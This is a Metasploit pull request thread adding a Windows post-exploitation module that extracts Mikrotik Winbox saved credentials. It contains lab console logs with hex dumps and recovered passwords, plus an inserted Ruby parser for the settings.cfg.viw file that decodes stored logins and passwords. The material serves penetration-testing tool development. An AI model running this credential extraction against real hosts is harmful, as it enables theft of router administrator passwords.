Add Post Windows Gather to perform Mikrotik Winbox "Keep Password" credentials extraction #18604

Merged
merged 7 commits into from Jan 9, 2024

Conversation

@siddolo (Contributor) commented Dec 7, 2023

This pull request introduces a new post module to extract Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.

Module Information

  • Name: post/windows/gather/credentials/winbox_settings
  • Targets: Mikrotik Winbox installation on Windows when the "Keep Password" option is selected
  • Tested Against: Mikrotik Winbox 3.40 (latest)

Verification

  • Get a meterpreter session on a Windows host.
  • Do: run post/windows/gather/credentials/winbox_settings
  • If any user on the system has Keep Password enabled in Winbox, the credentials will be printed out.

Documentation Addition

I have included comprehensive documentation.

@bwatters-r7 self-assigned this Dec 7, 2023
@bwatters-r7 added the docs and rn-modules (release notes for new or majorly enhanced modules) labels Dec 7, 2023
@siddolo (Contributor, Author) commented Dec 30, 2023

Do you need something to merge this PR?

@bwatters-r7 (Contributor)

> Do you need something to merge this PR?

Hi there; sorry about how long this is taking. I grabbed this a while back because I saw that you're only supporting Meterpreter, and it should be quick to make sure it supports Meterpreter, shell, and powershell sessions. Unfortunately, I was working on some other stuff that took longer than expected, and then I was out on holiday.

TL;DR, I think the switch would be straightforward if you use the methods defined in https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb rather than calls to fs.file.

I'm catching up after being out for a bit, but I will take a deeper look into this in the next week. If you'd like to check to see if it is possible to support other session types, please have at it. Otherwise, I'll try and send some more specific guidance in the next couple of days.

@bwatters-r7 (Contributor)

Using Meterpreter on Windows 10 x64 22H2

msf6 post(windows/gather/credentials/winbox_settings) > 
[*] Sending stage (200774 bytes) to 10.5.132.118
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:52364) at 2024-01-05 15:56:38 -0600

msf6 post(windows/gather/credentials/winbox_settings) > set session 2
session => 2
msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[-] An error occurred: EOFError
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed
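An added example, not the module's code and not written by anyone on this thread, that parses the record layout visible in the hex dump above and pulls out the saved login when Keep Password is on. The layout is inferred from the dump and is an assumption, not something the page documents: each entry is a little-endian 16-bit entry length, a one-byte key length, the key, then the value (entry length = 1 + key length + value length), and an entry length of zero closes the current record. The sample bytes are the addr, keeppwd, login and pwd entries copied from the dump, followed by a constructed second record with keeppwd=0. Since the first run above ended in EOFError, the parser stops at a truncated entry and returns what it has read instead of raising.

```ruby
# Record layout assumed from the settings.cfg.viw hex dump (inference, not documented):
#   [u16 LE entry_len][u8 key_len][key bytes][value bytes]
#   entry_len == 1 + key_len + value.bytesize; entry_len == 0 ends a record.
#
# Constructed sample: first record = addr/keeppwd/login/pwd entries from the dump,
# second record = a made-up profile with Keep Password off. No comments inside the
# heredoc, because hex_to_bytes strips everything that is not a hex digit.
SAMPLE_HEX = <<~HEX
  11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e 31 30 37
  09 00 07 6b 65 65 70 70 77 64 01
  0b 00 05 6c 6f 67 69 6e 61 64 6d 69 6e
  0f 00 03 70 77 64 76 33 4d 70 61 73 73 77 6f 72 64
  00 00
  0e 00 04 61 64 64 72 31 39 32 2e 30 2e 32 2e 31
  09 00 07 6b 65 65 70 70 77 64 00
  0b 00 05 6c 6f 67 69 6e 67 75 65 73 74
  00 00
HEX

# Turns a whitespace/anything-separated hex dump into a binary string.
def hex_to_bytes(hex)
  [hex.delete('^0-9a-fA-F')].pack('H*')
end

# Walks the byte string and returns one Hash per record (key => raw value bytes).
# A truncated or malformed entry ends parsing; whatever was read so far is kept,
# so a short or damaged file yields partial data rather than an exception.
def parse_records(data)
  records = []
  current = {}
  pos = 0
  while pos + 2 <= data.bytesize
    entry_len = data.byteslice(pos, 2).unpack1('v')
    pos += 2
    if entry_len.zero?
      records << current unless current.empty?
      current = {}
      next
    end
    break if pos + entry_len > data.bytesize           # truncated entry
    key_len = data.getbyte(pos)
    break if key_len + 1 > entry_len                    # key longer than entry: malformed
    key = data.byteslice(pos + 1, key_len)
    value = data.byteslice(pos + 1 + key_len, entry_len - 1 - key_len)
    current[key] = value
    pos += entry_len
  end
  records << current unless current.empty?              # unterminated trailing record
  records
end

# Returns [{ addr:, login:, pwd: }] for every record whose keeppwd flag is 1.
# Records with Keep Password off carry no pwd entry worth reporting, so they are skipped.
def extract_credentials(data)
  parse_records(data).filter_map do |rec|
    next unless rec['keeppwd']&.getbyte(0) == 1
    next unless rec['login'] && rec['pwd']
    { addr: rec['addr'].to_s, login: rec['login'], pwd: rec['pwd'] }
  end
end

if $PROGRAM_NAME == __FILE__
  extract_credentials(hex_to_bytes(SAMPLE_HEX)).each do |c|
    puts "#{c[:addr]}: #{c[:login]} / #{c[:pwd]}"
  end
end
```

Inside a post module the bytes would come from read_file in Msf::Post::File (the file bwatters-r7 points to above), which is what makes the same code work on meterpreter, shell and powershell sessions; that wiring is not shown on this page.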

@bwatters-r7 (Contributor)

I sent you a PR to this branch with shell sessions working; it should support powershell sessions, too, but I have not tested it.
siddolo#1

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed
msf6 post(windows/gather/credentials/winbox_settings) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  2         meterpreter x64/windows  DESKTOP-V413087\msfconsole @ DESKTOP-V413087    10.5.135.201:4444 -> 10.5.132.118:52364 (10.5.
                                                                                     132.118)
  3         meterpreter x64/windows  DESKTOP-V413087\msfconsole @ DESKTOP-V413087    10.5.135.201:4444 -> 10.5.132.118:58952 (10.5.
                                                                                     132.118)
  4         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.  10.5.135.201:4445 -> 10.5.132.118:52380 (10.5.
                                     19045.2006] -----                               132.118)

msf6 post(windows/gather/credentials/winbox_settings) > set session 4
session => 4
msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed

Quick change to add support for more sessions and to only read the fi…

@bwatters-r7 left a comment

msf6 post(windows/gather/credentials/winbox_settings) > sessions -i 1
[*] Starting interaction with 1...

PS C:\Users\msfconsole\Desktop> whoami
desktop-v413087\msfconsole
PS C:\Users\msfconsole\Desktop> ^Z
Background session 1? [y/N]  y
msf6 post(windows/gather/credentials/winbox_settings) > show options

Module options (post/windows/gather/credentials/winbox_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed

modules/post/windows/gather/credentials/winbox_settings.rb (outdated review thread, resolved)
Co-authored-by: Brendan <bwatters@rapid7.com>
@siddolo (Contributor, Author) commented Jan 8, 2024

done, thanks for your checks

@bwatters-r7 bwatters-r7 merged commit 57c882c into rapid7:master Jan 9, 2024
34 checks passed
@bwatters-r7 (Contributor)

Release Notes

This pull request introduces a new post module to extract Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.
